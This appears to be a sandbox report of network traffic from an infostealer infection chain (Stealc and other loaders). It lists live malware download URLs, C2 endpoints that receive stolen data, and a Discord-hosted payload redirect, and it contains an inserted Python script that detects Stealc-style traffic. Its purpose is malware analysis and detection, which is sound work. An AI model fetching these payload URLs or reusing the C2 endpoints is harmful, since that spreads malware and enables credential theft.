                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:37 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 320000
                                                                                                                                                Last-Modified: Wed, 11 Sep 2024 19:08:04 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e1ea94-4e200"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.117/inc/needmoney.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.117:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/needmoney.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.117
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:57 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 4278784
                                                                                                                                                Last-Modified: Thu, 12 Sep 2024 13:56:06 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e2f2f6-414a00"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.117/inc/crypted.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.117:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/crypted.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.117
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:08 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 321024
                                                                                                                                                Last-Modified: Fri, 13 Sep 2024 21:22:58 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e4ad32-4e600"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.26/Nework.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.26:80
                                                                                                                                                Request
                                                                                                                                                GET /Nework.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.26
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:41 GMT
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Content-Length: 425984
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT
                                                                                                                                                ETag: "68000-620711078a800"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                Hkbsse.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.26:80
                                                                                                                                                Request
                                                                                                                                                POST /Dem7kTu/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.26
                                                                                                                                                Content-Length: 4
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                Hkbsse.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.26:80
                                                                                                                                                Request
                                                                                                                                                POST /Dem7kTu/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.26
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET / HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:43 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 214
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:43 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 180
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
• flag: RU
  POST http://185.215.113.17/2fb6c2cc8dce150a.php
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    POST /2fb6c2cc8dce150a.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFB
    Host: 185.215.113.17
    Content-Length: 268
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:44 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 1520
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
• flag: RU
  POST http://185.215.113.17/2fb6c2cc8dce150a.php
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    POST /2fb6c2cc8dce150a.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIE
    Host: 185.215.113.17
    Content-Length: 267
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:44 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 7116
    Keep-Alive: timeout=5, max=97
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
• flag: RU
  POST http://185.215.113.17/2fb6c2cc8dce150a.php
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    POST /2fb6c2cc8dce150a.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJ
    Host: 185.215.113.17
    Content-Length: 268
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:45 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 108
    Keep-Alive: timeout=5, max=96
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
• flag: RU
  POST http://185.215.113.17/2fb6c2cc8dce150a.php
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    POST /2fb6c2cc8dce150a.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH
    Host: 185.215.113.17
    Content-Length: 5051
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:45 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=95
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
• flag: RU
  GET http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1
    Host: 185.215.113.17
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:45 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
    ETag: "10e436-5e7ec6832a180"
    Accept-Ranges: bytes
    Content-Length: 1106998
    Content-Type: application/x-msdos-program
• flag: RU
  POST http://185.215.113.17/2fb6c2cc8dce150a.php
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    POST /2fb6c2cc8dce150a.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI
    Host: 185.215.113.17
    Content-Length: 363
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:46 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=93
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
• flag: RU
  GET http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1
    Host: 185.215.113.17
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:46 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
    ETag: "a7550-5e7e950876500"
    Accept-Ranges: bytes
    Content-Length: 685392
    Content-Type: application/x-msdos-program
• flag: RU
  GET http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1
    Host: 185.215.113.17
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:47 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
    ETag: "94750-5e7e950876500"
    Accept-Ranges: bytes
    Content-Length: 608080
    Content-Type: application/x-msdos-program
• flag: RU
  GET http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1
    Host: 185.215.113.17
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:47 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
    ETag: "6dde8-5e7e950876500"
    Accept-Ranges: bytes
    Content-Length: 450024
    Content-Type: application/x-msdos-program
• flag: RU
  GET http://185.215.113.17/f1ddeb6592c03206/nss3.dll
  stealc_default2.exe
  Remote address: 185.215.113.17:80
  Request
    GET /f1ddeb6592c03206/nss3.dll HTTP/1.1
    Host: 185.215.113.17
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 05:01:48 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
    ETag: "1f3950-5e7e950876500"
    Accept-Ranges: bytes
    Content-Length: 2046288
    Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:49 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                ETag: "3ef50-5e7e950876500"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 257872
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:49 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                ETag: "13bf0-5e7e950876500"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 80880
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIID
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 827
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=86
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 267
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 2408
                                                                                                                                                Keep-Alive: timeout=5, max=85
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFC
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 265
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=84
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 363
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=83
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 272
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=82
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 272
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=81
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
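The stealc_default2.exe traffic above has a recognisable shape: three GETs that pull nss3.dll, softokn3.dll and vcruntime140.dll (Mozilla NSS and Visual C++ runtime libraries, which stealers load to decrypt Firefox credential stores) from 185.215.113.17, followed by six multipart/form-data POSTs to /2fb6c2cc8dce150a.php on the same host, five of which get an empty 200 reply. The script below is an added example, not part of the sandbox report or of any listed family's code: it parses entries written in this report's flattened layout and flags a (process, host) pair that shows that staging-then-POST order. SAMPLE is constructed from three of the entries on this page, trimmed to the headers the logic reads; the dict keys and function names are the example's own.

```python
"""Parse this report's HTTP-request entries and flag the Stealc C2 shape.
Added example, not part of the sandbox report; SAMPLE is built from three
of the entries above, trimmed to the headers the logic reads."""
from collections import defaultdict
from urllib.parse import urlparse

SAMPLE = """\
• flag-ru
GET
http://185.215.113.17/f1ddeb6592c03206/nss3.dll
stealc_default2.exe
Remote address:
185.215.113.17:80
Response
HTTP/1.1 200 OK
Content-Length: 2046288
Content-Type: application/x-msdos-program
• flag-ru
POST
http://185.215.113.17/2fb6c2cc8dce150a.php
stealc_default2.exe
Remote address:
185.215.113.17:80
Request
POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIID
Response
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/html; charset=UTF-8
• flag-us
GET
http://103.130.147.211/Files/2.exe
axplong.exe
Remote address:
103.130.147.211:80
Response
HTTP/1.1 200 OK
Content-Length: 6664351
Content-Type: application/x-msdownload
"""
# MIME types the two servers above used when serving PE payloads.
PE_TYPES = {"application/x-msdos-program", "application/x-msdownload"}


def parse_entries(text):
    """One dict per '•' bullet: method, url, process, remote, status, headers."""
    entries, cur, section, meta = [], None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("•"):  # new entry; 'flag-xx' is the report's geo hint
            cur = {"country": line.rsplit("flag-", 1)[-1].upper(), "status": None,
                   "req_headers": {}, "res_headers": {}}
            entries.append(cur)
            section, meta = "meta", []
        elif not line or cur is None:
            continue
        elif line in ("Request", "Response"):
            section = line.lower()
        elif section == "meta":  # fixed order: method, URL, process, label, host:port
            meta.append(line)
            for pos, key in ((1, "method"), (2, "url"), (3, "process"), (5, "remote")):
                if len(meta) == pos:
                    cur[key] = line
        elif section == "response" and line.startswith("HTTP/"):
            cur["status"] = int(line.split()[1])
        elif section in ("request", "response") and ": " in line:
            k, v = line.split(": ", 1)
            cur[section[:3] + "_headers"][k.lower()] = v
    return entries


def stealc_like_sessions(entries):
    """Per (process, host): DLL payload GETs plus multipart POSTs to a .php
    path on the same host, the staging-then-exfil order shown in the report."""
    by_key = defaultdict(list)
    for e in entries:
        by_key[(e["process"], urlparse(e["url"]).hostname)].append(e)
    hits = []
    for (proc, host), es in by_key.items():
        dlls = sorted(urlparse(e["url"]).path for e in es
                      if e["method"] == "GET" and e["status"] == 200
                      and e["res_headers"].get("content-type") in PE_TYPES
                      and e["url"].lower().endswith(".dll"))
        posts = [e for e in es if e["method"] == "POST"
                 and e["req_headers"].get("content-type", "").startswith("multipart/form-data")
                 and urlparse(e["url"]).path.endswith(".php")]
        if dlls and posts:
            hits.append({"process": proc, "host": host, "dlls": dlls,
                         "post_path": urlparse(posts[0]["url"]).path, "posts": len(posts),
                         "empty_replies": sum(p["res_headers"].get("content-length") == "0"
                                              for p in posts)})
    return hits


if __name__ == "__main__":
    for h in stealc_like_sessions(parse_entries(SAMPLE)):
        print(f"{h['process']} -> {h['host']}: staged {h['dlls']}; {h['posts']} multipart "
              f"POST(s) to {h['post_path']}, {h['empty_replies']} answered with empty 200")
```

Run against the full entry list of this report, the same logic would report stealc_default2.exe with all three DLL paths and six POSTs, five of them answered with Content-Length: 0; the axplong.exe download of /Files/2.exe is not flagged because it fetches an .exe and never POSTs to that host. The host:port, URL paths and payload sizes the parser collects are the IOCs worth exporting from a report like this.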
• [US]
GET http://103.130.147.211/Files/2.exe
Process: axplong.exe
Remote address: 103.130.147.211:80
Request
  GET /Files/2.exe HTTP/1.1
  Host: 103.130.147.211
Response
  HTTP/1.1 200 OK
  Date: Mon, 16 Sep 2024 05:01:44 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
  Last-Modified: Mon, 16 Sep 2024 00:25:38 GMT
  ETag: "65b09f-622319cb8466e"
  Accept-Ranges: bytes
  Content-Length: 6664351
  Content-Type: application/x-msdownload
• [TM]
GET http://91.202.233.158/
Process: svchost015.exe
Remote address: 91.202.233.158:80
Request
  GET / HTTP/1.1
  Host: 91.202.233.158
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:02 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-tm
                                                                                                                                                POST
                                                                                                                                                http://91.202.233.158/e96ea2db21fa9a1b.php
                                                                                                                                                svchost015.exe
                                                                                                                                                Remote address:
                                                                                                                                                91.202.233.158:80
                                                                                                                                                Request
                                                                                                                                                POST /e96ea2db21fa9a1b.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBG
                                                                                                                                                Host: 91.202.233.158
                                                                                                                                                Content-Length: 213
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:02 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 8
                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                fivevd5vs.top
                                                                                                                                                2.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                fivevd5vs.top
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                fivevd5vs.top
                                                                                                                                                IN A
                                                                                                                                                188.225.44.114
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                2.exe
                                                                                                                                                Remote address:
                                                                                                                                                188.225.44.114:80
                                                                                                                                                Request
                                                                                                                                                POST /v1/upload.php HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary38542015
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 412
                                                                                                                                                Host: fivevd5vs.top
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:05 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                2.exe
                                                                                                                                                Remote address:
                                                                                                                                                188.225.44.114:80
                                                                                                                                                Request
                                                                                                                                                POST /v1/upload.php HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary79302191
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 73186
                                                                                                                                                Host: fivevd5vs.top
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:09 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://194.58.114.223/d/385121
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                194.58.114.223:80
                                                                                                                                                Request
                                                                                                                                                GET /d/385121 HTTP/1.1
                                                                                                                                                Host: 194.58.114.223
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:10 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                Location: https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&
                                                                                                                                              • flag-us
                                                                                                                                                DNS
